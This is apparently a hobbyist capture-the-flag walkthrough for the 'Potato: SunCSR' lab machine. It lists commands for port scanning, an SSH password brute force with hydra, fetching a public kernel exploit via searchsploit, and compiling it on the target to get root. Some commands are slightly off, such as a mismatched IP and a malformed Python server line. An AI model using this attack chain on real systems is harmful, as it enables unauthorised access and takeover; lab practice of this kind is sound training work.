Potato:sunCSR

Lets start with nmap.

> nmap -p- -sC -sV 10.0.2.74

Norway

port 80 as http and 7120 open as ssh..let’s open port 80 (on browser) and start gobuster for finding hidden directories..

> gobuster dir -u http://10.0.2.64 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .txt .php .js

Norway

Nothing find anything intresting!

Norway

i run nikto also but, same...

> nikto -h 10.0.2.74

Norway

.Now i decide to do brute-force by guessing username "potato"...

> hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.74:7120

Norway

Got potato's credentials

potato:letmein

After enter in ssh port i didn't find anything, even i didn't find any useful SUID.

Norway

so i check os version .... and i found that this is very old version of ubuntu.

Norway

So, i use searchsploit to find its vulnerablity, and download it into my local pc.

> searchsploit ubuntu 3.13

> searchsploit -m 37292.c

Norway

Now, i'll transfer this file to victim's PC by python

> python3 http.server 9002

Norway

Now, compile this file..

> gcc 37292.c -o shell

Norway

run this file...and you should get root shell :)

Norway

!! Happy Hacking !!